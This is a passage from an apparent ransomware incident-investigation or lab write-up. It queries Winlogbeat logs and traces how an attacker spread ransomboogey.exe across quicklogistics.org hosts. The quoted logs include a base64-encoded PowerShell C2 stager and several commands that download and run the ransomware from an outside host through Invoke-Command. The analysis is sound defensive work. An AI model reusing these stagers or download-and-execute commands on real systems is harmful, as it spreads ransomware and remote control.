0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"
2023-08-30T02:06:25.390Z Administrator@WKSTN-0051 2340 5004 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==}"
The attacker after having full control of the QUICKLOGISTICS.ORG
domain downloaded and executed suspicious file, ransomboogey.exe
, as well as on WKSTN-1327
. The ransomware was downloaded on WKSTN-0051
but there were no signs of execution:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01 | grep 4008
[..omitted..]
2023-08-30T01:53:13.738Z Administrator@DC01 4308 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe"
2023-08-30T01:53:33.815Z Administrator@DC01 5572 4008 "C:\Users\Administrator\ransomboogey.exe"
2023-08-30T01:54:11.095Z Administrator@DC01 4404 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {hostname}"
2023-08-30T01:54:24.982Z Administrator@DC01 6808 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {hostname}"
2023-08-30T01:56:05.018Z Administrator@DC01 4296 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile ransomboogey.exe; .\ransomboogey.exe}"
2023-08-30T01:56:40.186Z Administrator@DC01 6436 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\itadmin\ransomboogey.exe; C:\Users\itadmin\ransomboogey.exe}"
2023-08-30T01:57:53.649Z Administrator@DC01 5984 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-1327.quicklogistics.org -ScriptBlock {C:\Users\itadmin\ransomboogey.exe}"
2023-08-30T01:59:36.244Z Administrator@DC01 5148 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\itadmin\ransomboogey.exe;}"
2023-08-30T02:00:58.090Z Administrator@DC01 3672 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {hostname}"
2023-08-30T02:01:14.244Z Administrator@DC01 4384 4008 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {iwr http://ff.sillytechninja.io/ransomboogey.exe -outfile C:\Users\evan.hutchinson\ransomboogey.exe;}"
[..omitted..]
An execution of ransomboogey.exe
by itadmin
could also be seen on WKSTN-1327
:
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp") \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 7300
[..omitted..]
2023-08-30T02:04:59.635Z itadmin@WKSTN-1327 7300 7264 C:\Windows\Explorer.EXE
[..omitted..]
2023-08-30T02:07:22.741Z itadmin@WKSTN-1327 8804 7300 "C:\Users\itadmin\ransomboogey.exe"
[..omitted..]
TIMESTAMP | EVENT |
---|---|